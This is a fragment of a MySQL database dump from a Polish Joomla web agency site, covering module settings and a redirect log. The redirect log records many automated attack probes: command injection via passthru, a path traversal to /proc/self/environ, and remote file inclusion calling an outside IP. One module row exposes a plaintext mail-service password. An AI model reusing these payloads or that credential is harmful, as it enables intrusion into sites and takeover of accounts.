00:00:00',0,'mod_banners',1,1,'{\"target\":\"1\",\"count\":\"1\",\"cid\":\"1\",\"catid\":[\"27\"],\"tag_search\":\"0\",\"ordering\":\"0\",\"header_text\":\"\",\"footer_text\":\"\",\"layout\":\"\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\"}',0,'*'),(19,'menu-top','','',1,'menu-top',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',1,1,'{\"menutype\":\"menu-top\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"1\",\"tag_id\":\"menu-top\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'*'),(20,'hdsh','','',0,'atomic-search',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_menu',1,1,'{\"menutype\":\"gfsd\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"0\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'*'),(21,'Nagłówek','','

Wszystko dla internetu

',1,'header',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,0,'{\"prepare_content\":\"1\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(22,'Boxy na stronie głównej','','',1,'boxys',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_articles_category',1,0,'{\"mode\":\"normal\",\"show_on_article_page\":\"1\",\"show_front\":\"show\",\"count\":\"3\",\"category_filtering_type\":\"1\",\"catid\":[\"7\"],\"show_child_category_articles\":\"0\",\"levels\":\"1\",\"author_filtering_type\":\"1\",\"created_by\":[\"\"],\"author_alias_filtering_type\":\"1\",\"created_by_alias\":[\"\"],\"excluded_articles\":\"\",\"date_filtering\":\"off\",\"date_field\":\"a.created\",\"start_date_range\":\"\",\"end_date_range\":\"\",\"relative_date\":\"30\",\"article_ordering\":\"a.ordering\",\"article_ordering_direction\":\"ASC\",\"article_grouping\":\"none\",\"article_grouping_direction\":\"ksort\",\"month_year_format\":\"F Y\",\"item_heading\":\"3\",\"link_titles\":\"0\",\"show_date\":\"0\",\"show_date_field\":\"created\",\"show_date_format\":\"Y-m-d H:i:s\",\"show_category\":\"0\",\"show_hits\":\"0\",\"show_author\":\"0\",\"show_introtext\":\"1\",\"introtext_limit\":\"100\",\"show_readmore\":\"0\",\"show_readmore_title\":\"0\",\"readmore_limit\":\"20\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"owncache\":\"1\",\"cache_time\":\"900\"}',0,'*'),(23,'Boxy ','','',0,'boxys',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',-2,'mod_articles_latest',1,1,'{\"catid\":[\"7\"],\"count\":\"3\",\"show_featured\":\"\",\"ordering\":\"c_dsc\",\"user_id\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(24,'Boxy na stronie głównej','','',1,'boxys',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_articles_news',1,1,'{\"catid\":[\"7\"],\"image\":\"1\",\"item_title\":\"1\",\"link_titles\":\"0\",\"item_heading\":\"h3\",\"showLastSeparator\":\"1\",\"readmore\":\"0\",\"count\":\"4\",\"ordering\":\"a.ordering\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'*'),(25,'Projekt i wykonanie','','

Projekt i wykonanie: WytwórniaStron.pl

',1,'project',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(26,'Strona Powstała - stopka','','

Strona powstała w ramach projektu “Doskonalenie zarządzania usługami publicznymi i rozwojem w jednostkach samorządu lokalnego (gminach i powiatach)” finansowanego przez Ministerstwo Spraw Wewnętrznych i Administracji z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki

',1,'powstanie-stopka',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,0,'{\"prepare_content\":\"1\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(27,'Freshmail Subscription','','',1,'fresh-mail',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_freshmail',1,1,'{\"FMlogin\":\"kontakt@wytworniastron.pl\",\"FMpassword\":\"poikq3V!\",\"FMsubscribersListHash\":\"p1ixivcpcm\",\"FMshowName\":\"1\",\"FMcustomField1\":\"6esid64mnu\",\"FMcustomFieldName1\":\"Kod pocztowy\",\"FMcustomField2\":\"m1povqnu52\",\"FMcustomFieldName2\":\"Miejscowo\\u015b\\u0107\",\"FMcustomField3\":\"\",\"FMcustomFieldName3\":\"\"}',0,'*'),(28,'Informacje o cookie','','
\r\n
\r\n

Strona korzysta z plików cookies w celu realizacji usług i zgodnie z Polityką Plików Cookies. Możesz określić warunki przechowywania lub dostępu do plików cookies w Twojej przeglądarce.

\r\nZamknij
\r\n
',1,'cookies-info',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'); /*!40000 ALTER TABLE `jos_modules` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_modules_menu` -- DROP TABLE IF EXISTS `jos_modules_menu`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_modules_menu` ( `moduleid` int(11) NOT NULL default '0', `menuid` int(11) NOT NULL default '0', PRIMARY KEY (`moduleid`,`menuid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_modules_menu` -- LOCK TABLES `jos_modules_menu` WRITE; /*!40000 ALTER TABLE `jos_modules_menu` DISABLE KEYS */; INSERT INTO `jos_modules_menu` VALUES (1,0),(2,0),(3,0),(4,0),(6,0),(7,0),(8,0),(9,0),(10,0),(12,0),(13,0),(14,0),(15,0),(16,0),(17,0),(18,0),(19,0),(20,0),(21,0),(22,0),(23,0),(24,0),(25,0),(26,0),(27,0),(28,0); /*!40000 ALTER TABLE `jos_modules_menu` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_newsfeeds` -- DROP TABLE IF EXISTS `jos_newsfeeds`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_newsfeeds` ( `catid` int(11) NOT NULL default '0', `id` int(10) unsigned NOT NULL auto_increment, `name` varchar(100) NOT NULL default '', `alias` varchar(100) NOT NULL default '', `link` varchar(200) NOT NULL default '', `filename` varchar(200) default NULL, `published` tinyint(1) NOT NULL default '0', `numarticles` int(10) unsigned NOT NULL default '1', `cache_time` int(10) unsigned NOT NULL default '3600', `checked_out` int(10) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `ordering` int(11) NOT NULL default '0', `rtl` tinyint(4) NOT NULL default '0', `access` tinyint(3) unsigned NOT NULL default '0', `language` char(7) NOT NULL default '', `params` text NOT NULL, `created` datetime NOT NULL default '0000-00-00 00:00:00', `created_by` int(10) unsigned NOT NULL default '0', `created_by_alias` varchar(255) NOT NULL default '', `modified` datetime NOT NULL default '0000-00-00 00:00:00', `modified_by` int(10) unsigned NOT NULL default '0', `metakey` text NOT NULL, `metadesc` text NOT NULL, `metadata` text NOT NULL, `xreference` varchar(50) NOT NULL COMMENT 'A reference to enable linkages to external data sets.', `publish_up` datetime NOT NULL default '0000-00-00 00:00:00', `publish_down` datetime NOT NULL default '0000-00-00 00:00:00', PRIMARY KEY (`id`), KEY `idx_access` (`access`), KEY `idx_checkout` (`checked_out`), KEY `idx_state` (`published`), KEY `idx_catid` (`catid`), KEY `idx_createdby` (`created_by`), KEY `idx_language` (`language`), KEY `idx_xreference` (`xreference`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_newsfeeds` -- LOCK TABLES `jos_newsfeeds` WRITE; /*!40000 ALTER TABLE `jos_newsfeeds` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_newsfeeds` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_redirect_links` -- DROP TABLE IF EXISTS `jos_redirect_links`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_redirect_links` ( `id` int(10) unsigned NOT NULL auto_increment, `old_url` varchar(150) NOT NULL, `new_url` varchar(150) NOT NULL, `referer` varchar(150) NOT NULL, `comment` varchar(255) NOT NULL, `published` tinyint(4) NOT NULL, `created_date` datetime NOT NULL default '0000-00-00 00:00:00', `modified_date` datetime NOT NULL default '0000-00-00 00:00:00', PRIMARY KEY (`id`), UNIQUE KEY `idx_link_old` (`old_url`), KEY `idx_link_modifed` (`modified_date`) ) ENGINE=InnoDB AUTO_INCREMENT=2586 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_redirect_links` -- LOCK TABLES `jos_redirect_links` WRITE; /*!40000 ALTER TABLE `jos_redirect_links` DISABLE KEYS */; INSERT INTO `jos_redirect_links` VALUES (1,'http://localhost/i24/index.php?option=com_content&view=article','','','',0,'2011-10-13 09:57:46','0000-00-00 00:00:00'),(2,'http://localhost/i24/kontakt','','','',0,'2011-10-14 09:36:42','0000-00-00 00:00:00'),(5,'http://localhost/i24/2011-07-14-06-49-45','','http://localhost/i24/hosting','',0,'2011-10-14 09:39:08','0000-00-00 00:00:00'),(6,'http://www.i24.pl/internet/','','http://www.i24.pl/','',0,'2011-12-02 18:14:14','0000-00-00 00:00:00'),(7,'http://www.i24.pl/kontakthttp://www.i24.pl/kontakt','','','',0,'2011-12-02 18:41:43','0000-00-00 00:00:00'),(8,'http://www.i24.pl/kontakthttp://','','','',0,'2011-12-02 18:41:46','0000-00-00 00:00:00'),(9,'http://www.i24.pl/kontakt.html','','http://www.i24.pl/','',0,'2011-12-02 18:47:21','0000-00-00 00:00:00'),(10,'http://www.i24.pl/efektowna-i-multimedialna-aplikacjia-internetowa.html','','','',0,'2011-12-02 18:47:29','0000-00-00 00:00:00'),(11,'http://www.i24.pl/serwery-hosting-dedykowany.html','','http://www.i24.pl/','',0,'2011-12-02 18:47:35','0000-00-00 00:00:00'),(12,'http://www.i24.pl/cms/18','','','',0,'2011-12-02 18:53:39','0000-00-00 00:00:00'),(13,'http://www.i24.pl/rozwiazania-ecommerce.html','','','',0,'2011-12-02 20:44:37','0000-00-00 00:00:00'),(14,'http://www.i24.pl/podstawowa-strona-internetowa.html','','','',0,'2011-12-02 21:09:25','0000-00-00 00:00:00'),(15,'http://www.i24.pl/portal-szyty-na-miare.html','','','',0,'2011-12-02 21:32:21','0000-00-00 00:00:00'),(16,'http://www.i24.pl/download/regulamin.pdf','','','',0,'2011-12-02 22:28:53','0000-00-00 00:00:00'),(17,'http://www.i24.pl/sklep-internetowy-dla-twoich-potrzeb.html','','','',0,'2011-12-03 01:52:02','0000-00-00 00:00:00'),(18,'http://www.i24.pl/szybki-dostep-do-internetu/9','','','',0,'2011-12-03 11:47:06','0000-00-00 00:00:00'),(19,'http://www.i24.pl/rozwiazania-ecommerce','','','',0,'2011-12-03 13:12:54','0000-00-00 00:00:00'),(20,'http://www.i24.pl/promocje','','','',0,'2011-12-03 16:05:14','0000-00-00 00:00:00'),(21,'http://www.i24.pl/efektowna-i-multimedialna-aplikacjia-internetowa','','','',0,'2011-12-03 21:06:23','0000-00-00 00:00:00'),(22,'http://www.i24.pl/portal-idealny-dla-spolecznosci','','','',0,'2011-12-03 21:46:19','0000-00-00 00:00:00'),(23,'http://www.i24.pl/szybki-dostep-do-internetu/dladomu','','','',0,'2011-12-04 12:42:08','0000-00-00 00:00:00'),(24,'http://www.i24.pl/szybki-dostep-do-internetu/pytania','','','',0,'2011-12-04 13:44:01','0000-00-00 00:00:00'),(25,'http://www.i24.pl/apps/phpAlbum/main.php?cmd=setquality&var1=1\'.passthru(\'id\').\';','','','',0,'2011-12-04 13:49:53','0000-00-00 00:00:00'),(26,'http://www.i24.pl/phpAlbum/main.php?cmd=setquality&var1=1\'.passthru(\'id\').\';','','','',0,'2011-12-04 13:49:53','0000-00-00 00:00:00'),(27,'http://www.i24.pl/main.php?cmd=setquality&var1=1\'.passthru(\'id\').\';','','','',0,'2011-12-04 13:49:54','0000-00-00 00:00:00'),(28,'http://www.i24.pl/awstatstotals.php?sort={${passthru(chr(105).chr(100))}}{${exit()}}','','','',0,'2011-12-04 13:49:54','0000-00-00 00:00:00'),(29,'http://www.i24.pl/awstats/awstatstotals.php?sort={${passthru(chr(105).chr(100))}}{${exit()}}','','','',0,'2011-12-04 13:49:54','0000-00-00 00:00:00'),(30,'http://www.i24.pl/awstatstotals/awstatstotals.php?sort={${passthru(chr(105).chr(100))}}{${exit()}}','','','',0,'2011-12-04 13:49:55','0000-00-00 00:00:00'),(31,'http://www.i24.pl/szybki-dostep-do-internetu/promocje','','','',0,'2011-12-04 14:59:55','0000-00-00 00:00:00'),(32,'http://www.i24.pl/sklep-internetowy-dla-twoich-potrzeb','','','',0,'2011-12-04 15:08:56','0000-00-00 00:00:00'),(33,'http://www.i24.pl/portal-idealny-dla-spolecznosci.html','','','',0,'2011-12-04 19:17:05','0000-00-00 00:00:00'),(34,'http://www.i24.pl/sklep-komputerowy','','','',0,'2011-12-05 00:00:23','0000-00-00 00:00:00'),(35,'http://www.i24.pl/porywajace-multimedia-gry-prezentacje.html','','','',0,'2011-12-05 01:17:46','0000-00-00 00:00:00'),(36,'http://www.i24.pl/szybki-dostep-do-internetu/dlafirm','','','',0,'2011-12-05 12:01:17','0000-00-00 00:00:00'),(37,'http://www.i24.pl/8','','','',0,'2011-12-05 13:40:12','0000-00-00 00:00:00'),(38,'http://www.i24.pl/start','','','',0,'2011-12-05 20:51:33','0000-00-00 00:00:00'),(39,'http://www.i24.pl/dladomu','','','',0,'2011-12-05 20:51:34','0000-00-00 00:00:00'),(40,'http://www.i24.pl/dlafirm','','','',0,'2011-12-05 20:51:34','0000-00-00 00:00:00'),(41,'http://www.i24.pl/pytania','','','',0,'2011-12-05 20:51:35','0000-00-00 00:00:00'),(42,'http://www.i24.pl/10','','','',0,'2011-12-05 20:51:35','0000-00-00 00:00:00'),(43,'http://www.i24.pl/9','','','',0,'2011-12-05 20:51:36','0000-00-00 00:00:00'),(44,'http://www.i24.pl/strona-produktowa.html','','','',0,'2011-12-05 21:31:09','0000-00-00 00:00:00'),(45,'http://www.i24.pl/strona-internetowa-z-bogatym-wyposazeniem','','','',0,'2011-12-05 23:02:05','0000-00-00 00:00:00'),(46,'http://www.i24.pl/szybki-dostep-do-internetu/start','','','',0,'2011-12-06 00:45:47','0000-00-00 00:00:00'),(47,'http://www.i24.pl/projektowanie-stron-internetowych.html','','','',0,'2011-12-06 02:55:53','0000-00-00 00:00:00'),(48,'http://www.i24.pl/projektowanie-stron-internetowych','','','',0,'2011-12-06 12:44:08','0000-00-00 00:00:00'),(49,'http://www.i24.pl/serwery-hosting-dedykowany','','','',0,'2011-12-06 12:44:12','0000-00-00 00:00:00'),(50,'http://www.i24.pl/speedtest','','','',0,'2011-12-07 07:49:38','0000-00-00 00:00:00'),(51,'http://www.i24.pl/15','','','',0,'2011-12-09 07:44:26','0000-00-00 00:00:00'),(52,'http://www.i24.pl/szybki-dostep-do-internetu/hosting','','','',0,'2011-12-09 09:35:27','0000-00-00 00:00:00'),(53,'http://www.i24.pl/cms','','','',0,'2011-12-09 10:22:16','0000-00-00 00:00:00'),(54,'http://www.i24.pl/strona-internetowa-z-bogatym-wyposazeniem.html','','','',0,'2011-12-09 17:02:57','0000-00-00 00:00:00'),(55,'http://www.i24.pl/strona-produktowa','','','',0,'2011-12-10 07:08:37','0000-00-00 00:00:00'),(56,'http://www.i24.pl/porywajace-multimedia-gry-prezentacje','','','',0,'2011-12-10 14:49:34','0000-00-00 00:00:00'),(57,'http://www.i24.pl/podstawowa-strona-internetowa','','','',0,'2011-12-10 18:05:27','0000-00-00 00:00:00'),(58,'http://www.i24.pl/index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ\0','','','',0,'2011-12-11 19:57:15','0000-00-00 00:00:00'),(59,'http://www.i24.pl/site.php?a={${passthru(chr(105).chr(100))}}','','','',0,'2011-12-11 19:57:16','0000-00-00 00:00:00'),(60,'http://www.i24.pl/cacati','','','',0,'2011-12-11 20:38:41','0000-00-00 00:00:00'),(61,'http://www.i24.pl/admin','','','',0,'2011-12-11 21:12:50','0000-00-00 00:00:00'),(62,'http://www.i24.pl/pub','','','',0,'2011-12-11 22:09:19','0000-00-00 00:00:00'),(63,'http://www.i24.pl/adminsasa','','','',0,'2011-12-12 10:24:06','0000-00-00 00:00:00'),(64,'http://www.i24.pl/new','','','',0,'2011-12-12 11:11:36','0000-00-00 00:00:00'),(65,'http://www.i24.pl/dmca.html','','http://www.i24.pl//','',0,'2011-12-13 04:28:09','0000-00-00 00:00:00'),(66,'http://www.i24.pl/17','','','',0,'2011-12-13 15:09:47','0000-00-00 00:00:00'),(67,'http://www.i24.pl/szybki-dostep-do-internetu/10','','','',0,'2011-12-13 16:08:00','0000-00-00 00:00:00'),(68,'http://www.i24.pl/portal-szyty-na-miare','','','',0,'2011-12-14 09:22:03','0000-00-00 00:00:00'),(69,'http://www.i24.pl/catalog/','','','',0,'2011-12-17 18:23:16','0000-00-00 00:00:00'),(70,'http://www.i24.pl/shop/','','','',0,'2011-12-17 18:23:16','0000-00-00 00:00:00'),(71,'http://www.i24.pl/pics/main.php?cmd=setquality&var1=1\'.passthru(\'id\').\';','','','',0,'2011-12-19 01:16:35','0000-00-00 00:00:00'),(72,'http://www.i24.pl/images/main.php?cmd=setquality&var1=1\'.passthru(\'id\').\';','','','',0,'2011-12-19 01:16:35','0000-00-00 00:00:00'),(73,'http://www.i24.pl/album/main.php?cmd=setquality&var1=1\'.passthru(\'id\').\';','','','',0,'2011-12-19 01:16:36','0000-00-00 00:00:00'),(74,'http://www.i24.pl/img/main.php?cmd=setquality&var1=1\'.passthru(\'id\').\';','','','',0,'2011-12-19 01:16:39','0000-00-00 00:00:00'),(75,'http://www.i24.pl/albums/main.php?cmd=setquality&var1=1\'.passthru(\'id\').\';','','','',0,'2011-12-19 01:16:39','0000-00-00 00:00:00'),(76,'http://www.i24.pl/photo/main.php?cmd=setquality&var1=1\'.passthru(\'id\').\';','','','',0,'2011-12-19 01:16:40','0000-00-00 00:00:00'),(77,'http://www.i24.pl/photos/main.php?cmd=setquality&var1=1\'.passthru(\'id\').\';','','','',0,'2011-12-19 01:16:41','0000-00-00 00:00:00'),(78,'http://www.i24.pl/photoalbum/main.php?cmd=setquality&var1=1\'.passthru(\'id\').\';','','','',0,'2011-12-19 01:16:41','0000-00-00 00:00:00'),(79,'http://www.i24.pl/photoalbums/main.php?cmd=setquality&var1=1\'.passthru(\'id\').\';','','','',0,'2011-12-19 01:16:45','0000-00-00 00:00:00'),(80,'http://www.i24.pl/pic/main.php?cmd=setquality&var1=1\'.passthru(\'id\').\';','','','',0,'2011-12-19 01:16:45','0000-00-00 00:00:00'),(81,'http://www.i24.pl/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]http://62.141.58.186/google.txt','','','',0,'2011-12-19 01:17:53','0000-00-00 00:00:00'),(82,'http://www.i24.pl/MOD_forum_fields_parse.php?phpbb_root_path=','','','',0,'2011-12-19 01:18:06','0000-00-00 00:00:00'),(83,'http://www.i24.pl/admin/addentry.php?phpbb_root_path=','','','',0,'2011-12-19 01:19:01','0000-00-00 00:00:00'),(84,'http://www.i24.pl/admin/admin_attachments.php?phpbb_root_path=','','','',0,'2011-12-19 01:19:04','0000-00-00 00:00:00'),(85,'http://www.i24.pl/admin/admin_board.php?phpbb_root_path=','','','',0,'2011-12-19 01:19:05','0000-00-00 00:00:00'),(86,'http://www.i24.pl/admin/admin_extensions.php?phpbb_root_path=','','','',0,'2011-12-19 01:19:06','0000-00-00 00:00:00'),(87,'http://www.i24.pl/admin/admin_forum_prune.php?phpbb_root_path=','','','',0,'2011-12-19 01:19:07','0000-00-00 00:00:00'),(88,'http://www.i24.pl/admin/admin_linkdb.php?phpbb_root_path=','','','',0,'2011-12-19 01:19:08','0000-00-00 00:00:00'),(89,'http://www.i24.pl/admin/admin_spam.php?phpbb_root_path=','','','',0,'2011-12-19 01:19:10','0000-00-00 00:00:00'),(90,'http://www.i24.pl/admin/admin_status.php?foing_root_path=','','','',0,'2011-12-19 01:19:10','0000-00-00 00:00:00'),(91,'http://www.i24.pl/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=','','','',0,'2011-12-19 01:19:12','0000-00-00 00:00:00'),(92,'http://www.i24.pl/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=','','','',0,'2011-12-19 01:19:13','0000-00-00 00:00:00'),(93,'http://www.i24.pl/admin/admin_users.php?phpbb_root_path=','','','',0,'2011-12-19 01:19:14','0000-00-00 00:00:00'),(94,'http://www.i24.pl/admin/config.php?foing_root_path=','','','',0,'2011-12-19 01:19:25','0000-00-00 00:00:00'),(95,'http://www.i24.pl/admin/edit_album.php?foing_root_path=','','','',0,'2011-12-19 01:19:29','0000-00-00 00:00:00'),(96,'http://www.i24.pl/admin/edit_artist.php?foing_root_path=','','','',0,'2011-12-19 01:19:29','0000-00-00 00:00:00'),(97,'http://www.i24.pl/admin/genres.php?foing_root_path=','','','',0,'2011-12-19 01:19:31','0000-00-00 00:00:00'),(98,'http://www.i24.pl/admin/index.php?foing_root_path=','','','',0,'2011-12-19 01:19:41','0000-00-00 00:00:00'),(99,'http://www.i24.pl/admin/list_artists.php?foing_root_path=','','','',0,'2011-12-19 01:19:46','0000-00-00 00:00:00'),(100,'http://www.i24.pl/admin/main.php?foing_root_path=','','','',0,'2011-12-19 01:19:47','0000-00-00 00:00:00'),(101,'http://www.i24.pl/admin/modules_data.php?phpbb_root_path=','','','',0,'2011-12-19 01:19:48','0000-00-00 00:00:00'),(102,'http://www.i24.pl/admin/nav.php?foing_root_path=','','','',0,'2011-12-19 01:19:48','0000-00-00 00:00:00'),(103,'http://www.i24.pl/auction/auction_common.php?phpbb_root_path=','','','',0,'2011-12-19 01:22:37','0000-00-00 00:00:00'),(104,'http://www.i24.pl/auth/auth.php?phpbb_root_path=','','','',0,'2011-12-19 01:22:42','0000-00-00 00:00:00'),(105,'http://www.i24.pl/auth/auth.php?smf_root_path=','','','',0,'2011-12-19 01:22:43','0000-00-00 00:00:00'),(106,'http://www.i24.pl/auth/auth_SMF/smf_root_path=','','','',0,'2011-12-19 01:22:43','0000-00-00 00:00:00'),(107,'http://www.i24.pl/auth/auth_phpbb/phpbb_root_path=','','','',0,'2011-12-19 01:22:44','0000-00-00 00:00:00'),(108,'http://www.i24.pl/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=','','','',0,'2011-12-19 01:22:46','0000-00-00 00:00:00'),(109,'http://www.i24.pl/blend_data/blend_common.php?phpbb_root_path=','','','',0,'2011-12-19 01:23:19','0000-00-00 00:00:00'),(110,'http://www.i24.pl/ciamos_path/modules/forum/include/config.php?module_cache_path=\'http://62.141.58.186/google.txt\'','','','',0,'2011-12-19 01:23:57','0000-00-00 00:00:00'),(111,'http://www.i24.pl/codebb/lang_select?phpbb_root_path=','','','',0,'2011-12-19 01:24:33','0000-00-00 00:00:00'),(112,'http://www.i24.pl/codebb/pass_code.php?phpbb_root_path=','','','',0,'2011-12-19 01:24:33','0000-00-00 00:00:00'),(113,'http://www.i24.pl/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php','','','',0,'2011-12-19 01:25:04','0000-00-00 00:00:00'),(114,'http://www.i24.pl/components/com_htmlarea3_xtd-c/popups/InsertFile/config.inc.php','','','',0,'2011-12-19 01:25:05','0000-00-00 00:00:00'),(115,'http://www.i24.pl/components/com_htmlarea3_xtd-c/popups/InsertFile/main.php','','','',0,'2011-12-19 01:25:05','0000-00-00 00:00:00'),(116,'http://www.i24.pl/components/com_htmlarea3_xtd-c/popups/insert_table.php','','','',0,'2011-12-19 01:25:06','0000-00-00 00:00:00'),(117,'http://www.i24.pl/components/com_htmlarea3_xtd-c/popups/select_character.php','','','',0,'2011-12-19 01:25:06','0000-00-00 00:00:00'),(118,'http://www.i24.pl/components/com_htmlarea3_xtd-c/popups/select_color.php','','','',0,'2011-12-19 01:25:06','0000-00-00 00:00:00'),(119,'http://www.i24.pl/core/admin/admin.php?p=admin&absoluteurlhttp://62.141.58.186/google.txt','','','',0,'2011-12-19 01:26:03','0000-00-00 00:00:00'),(120,'http://www.i24.pl/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurlhttp://62.141.58.186/google.txt','','','',0,'2011-12-19 01:26:04','0000-00-00 00:00:00'),(121,'http://www.i24.pl/core/admin/categories_add.php?absoluteurlhttp://62.141.58.186/google.txt','','','',0,'2011-12-19 01:26:04','0000-00-00 00:00:00'),(122,'http://www.i24.pl/core/admin/categories_remove.php?absoluteurlhttp://62.141.58.186/google.txt','','','',0,'2011-12-19 01:26:05','0000-00-00 00:00:00'),(123,'http://www.i24.pl/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurlhttp://62.141.58.186/google.txt','','','',0,'2011-12-19 01:26:05','0000-00-00 00:00:00'),(124,'http://www.i24.pl/core/admin/editdel.php?p=admin&absoluteurlhttp://62.141.58.186/google.txt','','','',0,'2011-12-19 01:26:06','0000-00-00 00:00:00'),(125,'http://www.i24.pl/core/admin/ftpfeature.php?p=admin&absoluteurlhttp://62.141.58.186/google.txt','','','',0,'2011-12-19 01:26:06','0000-00-00 00:00:00'),(126,'http://www.i24.pl/core/admin/login.php?absoluteurlhttp://62.141.58.186/google.txt','','','',0,'2011-12-19 01:26:06','0000-00-00 00:00:00'),(127,'http://www.i24.pl/core/admin/pgRSSnews.php?absoluteurlhttp://62.141.58.186/google.txt','','','',0,'2011-12-19 01:26:07','0000-00-00 00:00:00'),(128,'http://www.i24.pl/core/admin/showcat.php?absoluteurlhttp://62.141.58.186/google.txt','','','',0,'2011-12-19 01:26:07','0000-00-00 00:00:00'),(129,'http://www.i24.pl/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurlhttp://62.141.58.186/google.txt','','','',0,'2011-12-19 01:26:08','0000-00-00 00:00:00'),(130,'http://www.i24.pl/core/archive_cat.php?absoluteurlhttp://62.141.58.186/google.txt','','','',0,'2011-12-19 01:26:08','0000-00-00 00:00:00'),(131,'http://www.i24.pl/core/archive_nocat.php?absoluteurlhttp://62.141.58.186/google.txt','','','',0,'2011-12-19 01:26:09','0000-00-00 00:00:00'),(132,'http://www.i24.pl/core/recent_list.php?absoluteurlhttp://62.141.58.186/google.txt','','','',0,'2011-12-19 01:26:12','0000-00-00 00:00:00'),(133,'http://www.i24.pl/elseif/moduleajouter/depot/usrdepot.php?corpsdesignhttp://62.141.58.186/google.txt','','','',0,'2011-12-19 01:27:10','0000-00-00 00:00:00'),(134,'http://www.i24.pl/ezconvert/config.php?ezconvert_dir=','','','',0,'2011-12-19 01:27:39','0000-00-00 00:00:00'),(135,'http://www.i24.pl/faq.php?foing_root_path=','','','',0,'2011-12-19 01:27:41','0000-00-00 00:00:00'),(136,'http://www.i24.pl/faq.php?phpbb_root_path=','','','',0,'2011-12-19 01:27:42','0000-00-00 00:00:00'),(137,'http://www.i24.pl/flash/get_song.php?foing_root_path=','','','',0,'2011-12-19 01:27:58','0000-00-00 00:00:00'),(138,'http://www.i24.pl/flash/initialise.php?foing_root_path=','','','',0,'2011-12-19 01:27:59','0000-00-00 00:00:00'),(139,'http://www.i24.pl/flash/set_na.php?foing_root_path=','','','',0,'2011-12-19 01:28:00','0000-00-00 00:00:00'),(140,'http://www.i24.pl/functions_rpg_events.php?phpbb_root_path=','','','',0,'2011-12-19 01:28:32','0000-00-00 00:00:00'),(141,'http://www.i24.pl/gen_m3u.php?foing_root_path=','','','',0,'2011-12-19 01:28:41','0000-00-00 00:00:00'),(142,'http://www.i24.pl/gen_m3u.php?phpbb_root_path=','','','',0,'2011-12-19 01:28:42','0000-00-00 00:00:00'),(143,'http://www.i24.pl/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=','','','',0,'2011-12-19 01:29:26','0000-00-00 00:00:00'),(144,'http://www.i24.pl/includes/archive/archive_topic.php?phpbb_root_path=','','','',0,'2011-12-19 01:30:39','0000-00-00 